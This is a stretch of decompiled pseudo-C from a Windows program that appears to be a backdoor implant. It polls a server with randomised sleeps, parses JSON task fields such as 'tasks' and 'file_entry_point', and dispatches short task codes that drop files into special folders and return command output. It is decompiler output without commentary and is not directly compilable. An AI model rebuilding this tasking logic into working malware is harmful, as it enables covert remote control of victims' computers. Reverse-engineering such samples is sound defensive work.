				if (E000002152152059A380(_t968, 0, 0, _t1042,  *((intOrPtr*)(_t1824 + 0xd8)) - _t1710 >> 6, 0x2067e1e0, (_t1918 << 6) + _t1710, _t194, 0x2067d140, _t1824, _t174,  *((intOrPtr*)(_t1824 + 0x2a8)), _t1912) != 0) goto 0x2058a728;
				_t969 = _t968 + 1;
				if (_t969 -  *((intOrPtr*)(_t1824 + 0xd8)) -  *((intOrPtr*)(_t1824 + 0xd0)) >> 6 < 0) goto 0x2058a6f0;
				goto 0x2058b901;
				 *0x206830a8 = _t969;
				r12d = r14d;
				 *(_t1824 + 0x9d0) = r14d;
				_t198 = _t1824 - 0x30; // -45
				 *(_t1826 + 0x20) = _t198;
				_t200 = _t1824 + 0x220; // 0x223
				_t201 = _t1824 + 0x190; // 0x193
				_t202 = _t1824 + 0x1d0; // 0x1d3
				E00000215215205C3D60(_t198, 0x2067e1e0, _t1826 + 0x70, _t202, _t201, _t200);
				 *(_t1826 + 0x20) = _t1826 + 0x50;
				_t1900 = _t1826 + 0x70;
				_t209 = _t1824 - 0x70; // -109
				E000002152152059A7F0(0, 0, _t1042, 1, _t969 -  *((intOrPtr*)(_t1824 + 0xd8)) -  *((intOrPtr*)(_t1824 + 0xd0)) >> 6, 0x2067e1e0, _t209, ( *0x206830a8 << 6) +  *((intOrPtr*)(_t1824 + 0xd0)), 0xffffffff, 0x2067d140, _t1824, ( *0x206830a8 << 6) +  *((intOrPtr*)(_t1824 + 0xd0)) + 0x20, _t1900, _t1912);
				if ( *(_t1824 - 0x60) != 0) goto 0x2058a885;
				r8d = E00000215215205FAB54(_t1826 + 0x50);
				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
				r8d = r8d + 0x19;
				_t988 = r8d * 0x3e8;
				Sleep(??);
				_t1276 =  *((intOrPtr*)(_t1824 - 0x58));
				if (_t1276 - 0x10 < 0) goto 0x2058a813;
				_t1458 =  *((intOrPtr*)(_t1824 - 0x70));
				if (_t1276 + 1 - _t1921 < 0) goto 0x2058a80e;
				if ((_t988 & 0x0000001f) != 0) goto 0x2058b944;
				_t1278 =  *((intOrPtr*)(_t1458 - 8));
				if (_t1278 - _t1458 >= 0) goto 0x2058b93e;
				_t1459 = _t1458 - _t1278;
				if (_t1459 - 8 < 0) goto 0x2058b938;
				if (_t1459 - 0x27 > 0) goto 0x2058b932;
				0x205f51e4();
				 *((long long*)(_t1824 - 0x58)) = 0xf;
				 *(_t1824 - 0x60) = _t1918;
				 *((char*)(_t1824 - 0x70)) = 0;
				_t1279 =  *(_t1824 - 0x78);
				if (_t1279 - 0x10 < 0) goto 0x2058a86f;
				_t1461 =  *((intOrPtr*)(_t1826 + 0x70));
				if (_t1279 + 1 - _t1921 < 0) goto 0x2058a86a;
				if ((_t988 & 0x0000001f) != 0) goto 0x2058b95c;
				_t1281 =  *((intOrPtr*)(_t1461 - 8));
				if (_t1281 - _t1461 >= 0) goto 0x2058b956;
				_t1462 = _t1461 - _t1281;
				if (_t1462 - 8 < 0) goto 0x2058b950;
				if (_t1462 - 0x27 > 0) goto 0x2058b94a;
				0x205f51e4();
				 *(_t1824 - 0x78) = 0xf;
				 *(_t1824 - 0x80) = _t1918;
				 *((char*)(_t1826 + 0x70)) = 0;
				goto 0x2058a6c0;
				if ( *(_t1826 + 0x60) == 0) goto 0x2058a8db;
				_t1718 =  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50;
				r8d =  *(_t1826 + 0x60);
				_t236 = _t1824 + 0x650; // 0x653
				E0000021521520581080(_t236,  >=  ?  *((void*)(_t1826 + 0x50)) : _t1826 + 0x50);
				_t237 = _t1824 - 0x70; // -109
				_t1720 =  >=  ?  *((void*)(_t1824 - 0x70)) : _t237;
				r8d =  *(_t1824 - 0x60);
				_t241 = _t1824 + 0x650; // 0x653
				_t778 = E0000021521520581420( *((long long*)(_t1824 - 0x58)) - 0x10, _t241,  >=  ?  *((void*)(_t1824 - 0x70)) : _t237);
				_t242 = _t1824 + 0x650; // 0x653
				E0000021521520581290(_t778, _t242);
				 *(_t1824 + 0xf0) = _t1281;
				 *(_t1824 + 0xf8) = _t1281;
				 *((intOrPtr*)(_t1824 + 0xfe)) = r14w;
				asm("xorps xmm0, xmm0");
				asm("movdqa [ebp+0x100], xmm0");
				asm("xorps xmm1, xmm1");
				asm("movdqa [ebp+0x110], xmm1");
				asm("movdqa [ebp+0x120], xmm0");
				 *(_t1824 + 0x130) = _t1918;
				 *((long long*)(_t1824 + 0x138)) = 0x400;
				 *(_t1824 + 0x140) = r14d;
				 *(_t1824 + 0x148) = _t1918;
				if ( *(_t1824 + 0x100) != _t1281) goto 0x2058a96e;
				E00000215215205F4DCC(_t1281, _t242);
				 *(_t1824 + 0x4c8) = _t1281;
				 *_t1281 = _t1918;
				_t1281[1] = 0x10000;
				_t1281[2] = _t1918;
				_t1281[3] = _t1918;
				_t1281[4] = _t1918;
				 *(_t1824 + 0x100) = _t1281;
				 *(_t1824 + 0x108) = _t1281;
				_t259 = _t1824 - 0x70; // -109
				_t1722 =  >=  ?  *((void*)(_t1824 - 0x70)) : _t259;
				_t262 = _t1824 + 0xf0; // 0xf3
				E000002152152058CF30(0x2067e1e0, _t262,  >=  ?  *((void*)(_t1824 - 0x70)) : _t259, 0x2067d140);
				if (_t1281[0xa] == 0) goto 0x2058aa9a;
				r8d = E00000215215205FAB54(_t1281);
				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
				r8d = r8d + 0x19;
				_t991 = r8d * 0x3e8;
				Sleep(??);
				if ( *(_t1824 + 0x108) == 0) goto 0x2058a9d2;
				E000002152152058C610(0x2067e1e0,  *(_t1824 + 0x108));
				0x205faea4();
				E00000215215205F51EC(_t1281, 0x2067e1e0, 0x2067d140);
				_t1282 =  *((intOrPtr*)(_t1824 - 0x58));
				if (_t1282 - 0x10 < 0) goto 0x2058aa39;
				_t1471 =  *((intOrPtr*)(_t1824 - 0x70));
				if (_t1282 + 1 - _t1921 < 0) goto 0x2058aa34;
				if ((_t991 & 0x0000001f) != 0) goto 0x2058b974;
				_t1284 =  *((intOrPtr*)(_t1471 - 8));
				if (_t1284 - _t1471 >= 0) goto 0x2058b96e;
				_t1472 = _t1471 - _t1284;
				if (_t1472 - 8 < 0) goto 0x2058b968;
				if (_t1472 - 0x27 > 0) goto 0x2058b962;
				0x205f51e4();
				 *((long long*)(_t1824 - 0x58)) = 0xf;
				 *(_t1824 - 0x60) = _t1918;
				 *((char*)(_t1824 - 0x70)) = 0;
				_t1285 =  *(_t1824 - 0x78);
				if (_t1285 - 0x10 < 0) goto 0x2058a86f;
				_t1474 =  *((intOrPtr*)(_t1826 + 0x70));
				if (_t1285 + 1 - _t1921 < 0) goto 0x2058a86a;
				if ((_t991 & 0x0000001f) != 0) goto 0x2058b98c;
				_t1287 =  *((intOrPtr*)(_t1474 - 8));
				if (_t1287 - _t1474 >= 0) goto 0x2058b986;
				_t1475 = _t1474 - _t1287;
				if (_t1475 - 8 < 0) goto 0x2058b980;
				if (_t1475 - 0x27 > 0) goto 0x2058b97a;
				goto 0x2058a867;
				_t1820 =  *((intOrPtr*)(_t1824 - 0x30));
				E000002152152058CA80(0x2067e1e0, _t1820,  *((intOrPtr*)(_t1824 - 0x28)), ( *0x206830a8 << 6) +  *((intOrPtr*)(_t1824 + 0xd0)) + 0x20);
				_t1922 = _t1820;
				 *((long long*)(_t1824 - 0x28)) = _t1820;
				if ( *((short*)(_t1824 + 0xfe)) != 3) goto 0x2058b7f0;
				_t1289 =  *(_t1824 + 0xf8) & 0xffffffff;
				_t1368 = (0x2067e1e0 << 5) + _t1289;
				_t290 = _t1824 + 0x4c0; // 0x4c3
				_t291 = _t1824 + 0xf0; // 0xf3
				E000002152152058C830(1, _t1368, _t291, _t290, _t1820, _t1824, "response_status");
				if ( *_t1289 == _t1368) goto 0x2058ab49;
				 *(_t1824 + 0x38) = _t1289;
				 *(_t1824 + 0x40) = _t1289;
				 *((short*)(_t1824 + 0x46)) = 0x405;
				_t1292 =  *(_t1824 + 0x40) & 0x00000000 | "response_status";
				 *(_t1824 + 0x40) = _t1292;
				 *(_t1824 + 0x38) = 0xf;
				_t298 = _t1824 + 0x38; // 0x3b
				_t299 = _t1824 + 0xf0; // 0xf3
				E000002152152058CE20(_t299, _t298, 0xffffffff, _t1820, _t1824, _t1918, _t1922);
				r12d =  *_t1292;
				 *(_t1824 + 0x9d0) = r12d;
				_t1294 =  *(_t1824 + 0xf8) & 0xffffffff;
				_t1370 = (_t1368 << 5) + _t1294;
				_t303 = _t1824 + 0x4b8; // 0x4bb
				_t304 = _t1824 + 0xf0; // 0xf3
				E000002152152058C830(1, _t1370, _t304, _t303, _t1820, _t1824, "tasks");
				if ( *_t1294 == _t1370) goto 0x2058b0dd;
				 *(_t1824 + 0x48) = _t1294;
				 *(_t1824 + 0x50) = _t1294;
				 *((short*)(_t1824 + 0x56)) = 0x405;
				_t1297 =  *(_t1824 + 0x50) & 0x00000000 | "tasks";
				 *(_t1824 + 0x50) = _t1297;
				 *(_t1824 + 0x48) = 5;
				_t311 = _t1824 + 0x48; // 0x4b
				_t312 = _t1824 + 0xf0; // 0xf3
				E000002152152058CE20(_t312, _t311, 0xffffffff, _t1820, _t1824, _t1918, _t1922);
				if ( *((short*)(_t1297 + 0xe)) != 4) goto 0x2058b0dd;
				 *(_t1824 + 0x58) = _t1297;
				 *(_t1824 + 0x60) = _t1297;
				 *((short*)(_t1824 + 0x66)) = 0x405;
				 *(_t1824 + 0x60) =  *(_t1824 + 0x60) & 0x00000000 | "tasks";
				 *(_t1824 + 0x58) = 5;
				_t320 = _t1824 + 0x58; // 0x5b
				_t321 = _t1824 + 0xf0; // 0xf3
				_t798 = E000002152152058CE20(_t321, _t320, 0xffffffff, _t1820, _t1824, _t1918, _t1922);
				_t322 = _t1824 + 0x260; // 0x263
				E000002152152058C4B0(_t798,  *(_t1824 + 0x60) & 0x00000000 | "tasks", _t322);
				_t1301 =  *((intOrPtr*)(_t1824 + 0x260));
				_t1812 = _t1301[2] & 0xffffffff;
				r14d =  *_t1301;
				_t1920 = (_t1918 << 4) + _t1812;
				if (_t1812 == _t1920) goto 0x2058b0d7;
				r13d = 0;
				 *(_t1824 + 0x3a0) = _t1917;
				 *(_t1824 + 0x3a8) = _t1917;
				 *(_t1824 + 0x3a8) = 0xf;
				 *(_t1824 + 0x3a0) = _t1917;
				 *((char*)(_t1824 + 0x390)) = 0;
				 *(_t1824 + 0x3c8) = _t1917;
				 *(_t1824 + 0x3d0) = _t1917;
				 *(_t1824 + 0x3d0) = 0xf;
				 *(_t1824 + 0x3c8) = _t1917;
				 *((char*)(_t1824 + 0x3b8)) = 0;
				 *(_t1824 + 0x3e8) = _t1917;
				 *(_t1824 + 0x3f0) = _t1917;
				 *(_t1824 + 0x3f0) = 0xf;
				 *(_t1824 + 0x3e8) = _t1917;
				 *((char*)(_t1824 + 0x3d8)) = 0;
				 *(_t1824 + 0x408) = _t1917;
				 *(_t1824 + 0x410) = _t1917;
				 *(_t1824 + 0x410) = 0xf;
				 *(_t1824 + 0x408) = _t1917;
				 *((char*)(_t1824 + 0x3f8)) = 0;
				if ( *((short*)(_t1812 + 0xe)) != 3) goto 0x2058b07e;
				_t1303 =  *(_t1812 + 8) & 0xffffffff;
				_t1372 = (_t1370 << 5) + _t1303;
				_t347 = _t1824 + 0x4b0; // 0x4b3
				E000002152152058C830(1, _t1372, _t1812, _t347, _t1820, _t1824, "task_data");
				if ( *_t1303 == _t1372) goto 0x2058adb9;
				 *(_t1824 + 0x28) = _t1303;
				 *(_t1824 + 0x30) = _t1303;
				 *((short*)(_t1824 + 0x36)) = 0x405;
				_t1306 =  *(_t1824 + 0x30) & 0x00000000 | "task_data";
				 *(_t1824 + 0x30) = _t1306;
				 *(_t1824 + 0x28) = 9;
				_t354 = _t1824 + 0x28; // 0x2b
				E000002152152058CE20(_t1812, _t354, _t1812, _t1820, _t1824, _t1920, _t1922);
				if (( *(_t1306 + 0xe) & 0x00001000) != 0) goto 0x2058ad8e;
				_t1308 =  *(_t1306 + 8) & 0xffffffff;
				if ( *_t1308 != 0) goto 0x2058ad98;
				goto 0x2058adaa;
				if ( *((char*)(_t1308 + (_t1917 | 0xffffffff) + 1)) != 0) goto 0x2058ada0;
				_t360 = _t1824 + 0x3b8; // 0x3bb
				E0000021521520586B10(_t1372, _t360, _t1308, _t1820, (_t1917 | 0xffffffff) + 1);
				_t1310 =  *(_t1812 + 8) & 0xffffffff;
				_t1374 = (_t1372 << 5) + _t1310;
				_t362 = _t1824 + 0x4a8; // 0x4ab
				E000002152152058C830(1, _t1374, _t1812, _t362, _t1820, _t1824, "task");
				if ( *_t1310 == _t1374) goto 0x2058ae69;
				 *(_t1824 + 0x68) = _t1310;
				 *(_t1824 + 0x70) = _t1310;
				 *((short*)(_t1824 + 0x76)) = 0x405;
				_t1313 =  *(_t1824 + 0x70) & 0x00000000 | "task";
				 *(_t1824 + 0x70) = _t1313;
				 *(_t1824 + 0x68) = 4;
				_t369 = _t1824 + 0x68; // 0x6b
				E000002152152058CE20(_t1812, _t369, _t1812, _t1820, _t1824, _t1920, _t1922);
				if (( *(_t1313 + 0xe) & 0x00001000) != 0) goto 0x2058ae40;
				_t1315 =  *(_t1313 + 8) & 0xffffffff;
				if ( *_t1315 != 0) goto 0x2058ae4a;
				goto 0x2058ae5a;
				if ( *((char*)(_t1315 + (_t1917 | 0xffffffff) + 1)) != 0) goto 0x2058ae50;
				_t375 = _t1824 + 0x390; // 0x393
				E0000021521520586B10(_t1374, _t375, _t1315, _t1820, (_t1917 | 0xffffffff) + 1);
				_t1317 =  *(_t1812 + 8) & 0xffffffff;
				_t1376 = (_t1374 << 5) + _t1317;
				_t377 = _t1824 + 0x4d0; // 0x4d3
				E000002152152058C830(1, _t1376, _t1812, _t377, _t1820, _t1824, "task_id");
				if ( *_t1317 == _t1376) goto 0x2058aeee;
				 *(_t1824 + 0x78) = _t1317;
				 *(_t1824 + 0x80) = _t1317;
				 *((short*)(_t1824 + 0x86)) = 0x405;
				_t1320 =  *(_t1824 + 0x80) & 0x00000000 | "task_id";
				 *(_t1824 + 0x80) = _t1320;
				 *(_t1824 + 0x78) = 7;
				_t384 = _t1824 + 0x78; // 0x7b
				E000002152152058CE20(_t1812, _t384, _t1812, _t1820, _t1824, _t1920, _t1922);
				 *((intOrPtr*)(_t1824 + 0x3b0)) =  *_t1320;
				_t1322 =  *(_t1812 + 8) & 0xffffffff;
				_t1378 = (_t1376 << 5) + _t1322;
				_t387 = _t1824 + 0x4a0; // 0x4a3
				E000002152152058C830(1, _t1378, _t1812, _t387, _t1820, _t1824, "file_entry_point");
				if ( *_t1322 == _t1378) goto 0x2058afb9;
				 *(_t1824 + 0x88) = _t1322;
				 *(_t1824 + 0x90) = _t1322;
				 *((short*)(_t1824 + 0x96)) = 0x405;
				_t1325 =  *(_t1824 + 0x90) & 0x00000000 | "file_entry_point";
				 *(_t1824 + 0x90) = _t1325;
				 *(_t1824 + 0x88) = 0x10;
				_t394 = _t1824 + 0x88; // 0x8b
				E000002152152058CE20(_t1812, _t394, _t1812, _t1820, _t1824, _t1920, _t1922);
				if (( *(_t1325 + 0xe) & 0x00001000) != 0) goto 0x2058af8a;
				_t1327 =  *(_t1325 + 8) & 0xffffffff;
				if ( *_t1327 != 0) goto 0x2058af94;
				goto 0x2058afaa;
				if ( *((char*)(_t1327 + (_t1917 | 0xffffffff) + 1)) != 0) goto 0x2058afa0;
				_t400 = _t1824 + 0x3d8; // 0x3db
				_t818 = E0000021521520586B10(_t1378, _t400, _t1327, _t1820, (_t1917 | 0xffffffff) + 1);
				_t401 = _t1824 + 0x390; // 0x393
				if (_t401 - _t1922 >= 0) goto 0x2058b039;
				_t402 = _t1824 + 0x390; // 0x393
				if (_t1820 - _t402 > 0) goto 0x2058b039;
				_t403 = _t1824 + 0x390; // 0x393
				if (_t1922 !=  *(_t1824 - 0x20)) goto 0x2058b010;
				_t409 = _t1824 - 0x30; // -45
				E000002152152058C510(_t818 * (_t403 - _t1820), _t409);
				_t1923 =  *((intOrPtr*)(_t1824 - 0x28));
				 *((long long*)(_t1824 + 0x268)) = _t1923;
				 *((long long*)(_t1824 + 0x270)) = _t1923;
				if (_t1923 == 0) goto 0x2058b037;
				_t821 = E000002152152058D0C0(_t1327 >> 3 >> 0x3f, (_t1327 >> 3) + (_t1327 >> 3 >> 0x3f), _t1923, ((_t1327 >> 3) + (_t1327 >> 3 >> 0x3f) + ((_t1327 >> 3) + (_t1327 >> 3 >> 0x3f)) * 8 << 4) +  *((intOrPtr*)(_t1824 - 0x30)),  *((intOrPtr*)(_t1824 - 0x30)), _t1900);
				goto 0x2058b073;
				if (_t1923 !=  *(_t1824 - 0x20)) goto 0x2058b050;
				_t417 = _t1824 - 0x30; // -45
				E000002152152058C510(_t821, _t417);
				_t1924 =  *((intOrPtr*)(_t1824 - 0x28));
				_t1822 =  *((intOrPtr*)(_t1824 - 0x30));
				 *((long long*)(_t1824 + 0x270)) = _t1924;
				 *((long long*)(_t1824 + 0x268)) = _t1924;
				if (_t1924 == 0) goto 0x2058b073;
				_t422 = _t1824 + 0x390; // 0x393
				_t823 = E000002152152058D0C0(_t1327 >> 3 >> 0x3f, (_t1327 >> 3) + (_t1327 >> 3 >> 0x3f), _t1924, _t422, _t1822, _t1900);
				_t1925 = _t1924 + 0x90;
				 *((long long*)(_t1824 - 0x28)) = _t1925;
				_t424 = _t1824 + 0x3f8; // 0x3fb
				_t824 = E0000021521520586820(_t823, 0x1000, _t424);
				_t425 = _t1824 + 0x3d8; // 0x3db
				_t825 = E0000021521520586820(_t824, 0x1000, _t425);
				_t426 = _t1824 + 0x3b8; // 0x3bb
				_t826 = E0000021521520586820(_t825, 0x1000, _t426);
				_t427 = _t1824 + 0x390; // 0x393
				E0000021521520586820(_t826, 0x1000, _t427);
				if (_t1812 + 0x10 != _t1920) goto 0x2058ac60;
				r12d =  *(_t1824 + 0x9d0);
				r13d = 3;
				goto 0x2058b0da;
				r14d = 0;
				if (r12d != 1) goto 0x2058b7f0;
				if (_t1822 != _t1925) goto 0x2058b201;
				r8d = E00000215215205FAB54(_t1327 >> 3 >> 0x3f);
				r8d = r8d - (0x28c1979 * r8d >> 0x20 >> 1) * 0xc9;
				r8d = r8d + 0x19;
				_t996 = r8d * 0x3e8;
				Sleep(??);
				if ( *(_t1824 + 0x108) == 0) goto 0x2058b12f;
				E000002152152058C610((_t1327 >> 3) + (_t1327 >> 3 >> 0x3f),  *(_t1824 + 0x108));
				0x205faea4();
				E00000215215205F51EC(_t1327 >> 3 >> 0x3f, (_t1327 >> 3) + (_t1327 >> 3 >> 0x3f), _t1822);
				_t1333 =  *((intOrPtr*)(_t1824 - 0x58));
				r15d = 0x1000;
				if (_t1333 - 0x10 < 0) goto 0x2058b1a0;
				_t1522 =  *((intOrPtr*)(_t1824 - 0x70));
				if (_t1333 + 1 - _t1925 < 0) goto 0x2058b19b;
				if ((_t996 & 0x0000001f) != 0) goto 0x2058b9a4;
				_t1335 =  *((intOrPtr*)(_t1522 - 8));
				if (_t1335 - _t1522 >= 0) goto 0x2058b99e;
				_t1523 = _t1522 - _t1335;
				if (_t1523 - 8 < 0) goto 0x2058b998;
				if (_t1523 - 0x27 > 0) goto 0x2058b992;
				0x205f51e4();
				 *((long long*)(_t1824 - 0x58)) = 0xf;
				 *(_t1824 - 0x60) = _t1920;
				 *((char*)(_t1824 - 0x70)) = 0;
				_t1336 =  *(_t1824 - 0x78);
				if (_t1336 - 0x10 < 0) goto 0x2058a86f;
				_t1525 =  *((intOrPtr*)(_t1826 + 0x70));
				if (_t1336 + 1 - _t1925 < 0) goto 0x2058a86a;
				if ((_t996 & 0x0000001f) != 0) goto 0x2058b9bc;
				_t1338 =  *((intOrPtr*)(_t1525 - 8));
				if (_t1338 - _t1525 >= 0) goto 0x2058b9b6;
				_t1526 = _t1525 - _t1338;
				if (_t1526 - 8 < 0) goto 0x2058b9b0;
				if (_t1526 - 0x27 > 0) goto 0x2058b9aa;
				goto 0x2058a867;
				r12d = 0;
				_t450 = _t1824 + 0x98; // 0x9b
				E0000021521520586430(__esp, (_t1327 >> 3) + (_t1327 >> 3 >> 0x3f), _t450, _t1822 + 0x28);
				_t1816 =  *((intOrPtr*)(_t1822 + 0x18));
				if (_t1816 - 0x10 < 0) goto 0x2058b230;
				goto 0x2058b233;
				_t1382 =  *((intOrPtr*)(_t1822 + 0x10));
				_t1867 =  <  ? _t1382 : _t1917;
				_t1173 =  <  ? _t1382 : _t1917;
				if (( <  ? _t1382 : _t1917) == 0) goto 0x2058b25b;
				if (E00000215215205F9A30(_t996, _t1822, "shi",  <  ? _t1382 : _t1917) != 0) goto 0x2058b30e;
				if (_t1382 != 3) goto 0x2058b30e;
				r8d = 0x208;
				E00000215215205F8EF0(_t996, 0, _t1042, __esp, 0x206830b0, "shi", _t1816,  <  ? _t1382 : _t1917);
				E00000215215205FAB54(_t1338);
				r9d = 0;
				_t459 = _t1900 + 0x26; // 0x26
				r8d = _t459;
				__imp__SHGetSpecialFolderPathA();
				lstrcatA(??, ??);
				 *((long long*)(_t1824 + 0x1f0)) = _t1338;
				 *((long long*)(_t1824 + 0x1f8)) = _t1338;
				 *((long long*)(_t1824 + 0x200)) = _t1338;
				_t465 = _t1824 + 0x1f0; // 0x1f3
				E00000215215205C7750(_t1338, _t1382, _t465, _t1816, _t1822, _t1900);
				if ( *((intOrPtr*)(_t1824 + 0x200)) == 0) goto 0x2058b270;
				_t467 = _t1824 + 0x98; // 0x9b
				E0000021521520587AE0(_t1338,  *((intOrPtr*)(_t1824 + 0x1f0)),  *((intOrPtr*)(_t1824 + 0x1f8)), _t467, _t1917);
				goto 0x2058b3ee;
				if (_t1816 - 0x10 < 0) goto 0x2058b319;
				goto 0x2058b31c;
				_t1870 =  <  ? _t1382 : _t1917;
				_t1179 =  <  ? _t1382 : _t1917;
				if (( <  ? _t1382 : _t1917) == 0) goto 0x2058b340;
				if (E00000215215205F9A30(0, _t1822, "dij",  <  ? _t1382 : _t1917) != 0) goto 0x2058b40b;
				if (_t1382 != 3) goto 0x2058b40b;
				r8d = 0x208;
				E00000215215205F8EF0(0, 0, _t1042, __esp, 0x206830b0, "dij", _t1816,  <  ? _t1382 : _t1917);
				_t845 = E00000215215205FAB54(_t1338);
				r9d = 0;
				_t476 = _t1900 + 0x26; // 0x26
				r8d = _t476;
				__imp__SHGetSpecialFolderPathA();
				lstrcatA(??, ??);
				 *((long long*)(_t1824 + 0x208)) = _t1338;
				 *((long long*)(_t1824 + 0x210)) = _t1338;
				 *((long long*)(_t1824 + 0x218)) = _t1338;
				_t482 = _t1824 + 0x208; // 0x20b
				E00000215215205C7750(_t1338, _t1382, _t482, _t1816, _t1822, _t1900);
				if ( *((intOrPtr*)(_t1824 + 0x218)) == 0) goto 0x2058b351;
				_t485 = _t1824 + 0x98; // 0x9b
				_t851 = E0000021521520587CB0(_t1382,  *((intOrPtr*)(_t1824 + 0x208)),  *((intOrPtr*)(_t1824 + 0x210)), _t1822, _t1824, _t485, _t1822 + 0x48);
				r12d = 0;
				if (_t851 == 0) goto 0x2058b796;
				 *(_t1822 + 0x88) = 1;
				goto 0x2058b796;
				if (_t1816 - 0x10 < 0) goto 0x2058b416;
				goto 0x2058b419;
				_t1873 =  <  ? _t1382 : _t1917;
				_t1186 =  <  ? _t1382 : _t1917;
				if (( <  ? _t1382 : _t1917) == 0) goto 0x2058b439;
				if (E00000215215205F9A30(0, _t1822, "dex",  <  ? _t1382 : _t1917) != 0) goto 0x2058b4b6;
				if (_t1382 != 3) goto 0x2058b4b6;
				r9d = 0;
				r8d = _t1382 + 0x19;
				__imp__SHGetSpecialFolderPathA();
				lstrcatA(??, ??);
				_t490 = _t1824 + 0x98; // 0x9b
				_t1763 =  >=  ?  *((void*)(_t1824 + 0x98)) : _t490;
				r8d =  *(_t1824 + 0xa8);
				if (E00000215215205CA9C8(_t1338, _t1382, 0x206830b0,  >=  ?  *((void*)(_t1824 + 0x98)) : _t490, _t1822, _t1822 + 0x48) == 0) goto 0x2058b796;
				E00000215215205CB510(_t854, 1, _t1382, 0x206830b0,  >=  ?  *((void*)(_t1824 + 0x98)) : _t490);
				 *(_t1822 + 0x88) = 1;
				goto 0x2058b796;
				if (_t1816 - 0x10 < 0) goto 0x2058b4c1;
				goto 0x2058b4c4;
				_t1875 =  <  ? _t1382 : _t1917;
				_t1193 =  <  ? _t1382 : _t1917;
				if (( <  ? _t1382 : _t1917) == 0) goto 0x2058b4e4;
				if (E00000215215205F9A30(0, _t1822, "sdl",  <  ? _t1382 : _t1917) != 0) goto 0x2058b501;
				if (_t1382 - 3 >= 0) goto 0x2058b4ef;
				goto 0x2058b4f9;
				if ((r12d & 0xffffff00 | _t1382 - 0x00000003 > 0x00000000) == 0) goto 0x2058bb86;
				if (E0000021521520587E00(_t1382, _t1822, "ins") == 0) goto 0x2058b56b;
				if ( *(_t1824 + 0x9c8) == 0) goto 0x2058b52c;
				0x20589d60();
				goto 0x2058b796;
				 *(_t1826 + 0x20) = 0;
				_t499 = _t1824 + 0x150; // 0x153
				_t500 = _t1824 + 0x1b0; // 0x1b3
				_t501 = _t1824 + 0x4f8; // 0x4fb
				_t502 = _t1824 + 0x298; // 0x29b
				if (E0000021521520587ED0(_t845 - "dij" + "dij" * 2, 0xe1, _t1382, _t502, _t501, _t1816, _t1822, _t500, _t499, 0x2063af30) != 0) goto 0x2058b9c2;
				0x20589d60();
				goto 0x2058b796;
				if (E0000021521520587E00(_t1382, _t1822, "gdt") == 0) goto 0x2058b796;
				_t503 = _t1824 + 0x5b0; // 0x5b3
				E00000215215205868F0(_t503, "\r", _t500);
				_t504 = _t1824 + 0x630; // 0x633
				E00000215215205868F0(_t504, 0x2063cf6e, _t500);
				_t505 = _t1824 + 0x98; // 0x9b
				_t506 = _t1824 + 0x5b0; // 0x5b3
				_t507 = _t1824 + 0x630; // 0x633
				_t865 = E00000215215205C80C0(_t1338, _t1382, _t507, _t506, _t1822, _t1824, _t505, 0x2063af30, _t1917, _t1925);
				_t508 = _t1824 + 0x630; // 0x633
				_t866 = E0000021521520586820(_t865, 0, _t508);
				_t509 = _t1824 + 0x5b0; // 0x5b3
				E0000021521520586820(_t866, 0, _t509);
				r8b = 0xa;
				_t510 = _t1824 + 0x98; // 0x9b
				_t511 = _t1824 + 0x338; // 0x33b
				_t868 = E00000215215205C802C(_t1382, _t511, _t510);
				_t512 = _t1824 + 8; // 0xb
				_t869 = E0000021521520586930(_t868, _t512);
				_t1383 =  *((intOrPtr*)(_t1824 + 0x338));
				_t1817 =  *((intOrPtr*)(_t1824 + 0x340));
				if (_t1383 == _t1817) goto 0x2058b778;
				asm("o16 nop [eax+eax]");
				_t515 = _t1824 + 0x350; // 0x353
				_t870 = E0000021521520586930(_t869, _t515);
				_t516 = _t1824 + 0x2f8; // 0x2fb
				E0000021521520586930(_t870, _t516);
				_t517 = _t1824 + 0x5f0; // 0x5f3
				E00000215215205868F0(_t517, 0x2063cf6e, _t505);
				_t518 = _t1824 + 0x5d0; // 0x5d3
				E00000215215205868F0(_t518, 0x2063cf6e, _t505);
				_t519 = _t1824 + 0x2f8; // 0x2fb
				 *(_t1826 + 0x20) = _t519;
				_t521 = _t1824 + 0x350; // 0x353
				_t522 = _t1824 + 0x5f0; // 0x5f3
				_t523 = _t1824 + 0x5d0; // 0x5d3
				r14b = E00000215215205BA9E0(_t845 - "dij" + "dij" * 2, 0, 0xe1, _t1042, 1, _t1383 - _t1817, _t1383, _t1383, _t523, _t1817, _t1822, _t1824, _t522, _t521, _t1920) == 0;
				_t524 = _t1824 + 0x5d0; // 0x5d3
				_t875 = E0000021521520586820(_t874, 0, _t524);
				_t525 = _t1824 + 0x5f0; // 0x5f3
				E0000021521520586820(_t875, 0, _t525);
				if (r14b == 0) goto 0x2058b710;
				if ( *((long long*)(_t1824 + 0x360)) == 0) goto 0x2058b710;
				_t527 = _t1824 + 0x518; // 0x51b
				E00000215215205893D0(_t1383, _t527, "Command : ", _t1822, _t1824, _t1383, _t521);
				_t528 = _t1824 + 8; // 0xb
				_t878 = E00000215215205888F0(0, _t1383, _t528, _t519, _t521);
				_t529 = _t1824 + 0x518; // 0x51b
				E0000021521520586820(_t878, 0, _t529);
				_t530 = _t1824 + 8; // 0xb
				E0000021521520586730(0xa, _t1383, _t530, _t1817);
				_t531 = _t1824 + 0x350; // 0x353
				_t532 = _t1824 + 8; // 0xb
				E00000215215205888F0(0, _t1383, _t532, _t531, _t521);
				_t533 = _t1824 + 8; // 0xb
				_t882 = E0000021521520586730(0xa, _t1383, _t533, _t1817);
				_t534 = _t1824 + 0x2f8; // 0x2fb
				_t883 = E0000021521520586820(_t882, 0, _t534);
				_t535 = _t1824 + 0x350; // 0x353
				_t884 = E0000021521520586820(_t883, 0, _t535);
				_t1384 = _t1383 + 0x20;
				if (_t1383 + 0x20 != _t1817) goto 0x2058b620;
				_t536 = _t1824 + 8; // 0xb
				E0000021521520587DF0(_t884, _t536);
				r8d =  *(_t1824 + 0x18);
				_t538 = _t1824 + 0x318; // 0x31b
				E0000021521520586200(__esp, _t519, _t1383 + 0x20, _t538, _t519);
				_t887 = E0000021521520588900(0, _t1383 + 0x20, _t1822 + 0x68, _t519);
				_t540 = _t1824 + 0x318; // 0x31b
				_t888 = E0000021521520586820(_t887, 0, _t540);
				 *(_t1822 + 0x88) = 1;
				goto 0x2058b77f;
				 *(_t1822 + 0x88) = r13d;
				_t543 = _t1824 + 8; // 0xb
				E0000021521520586820(_t888, 0, _t543);
				_t544 = _t1824 + 0x338; // 0x33b
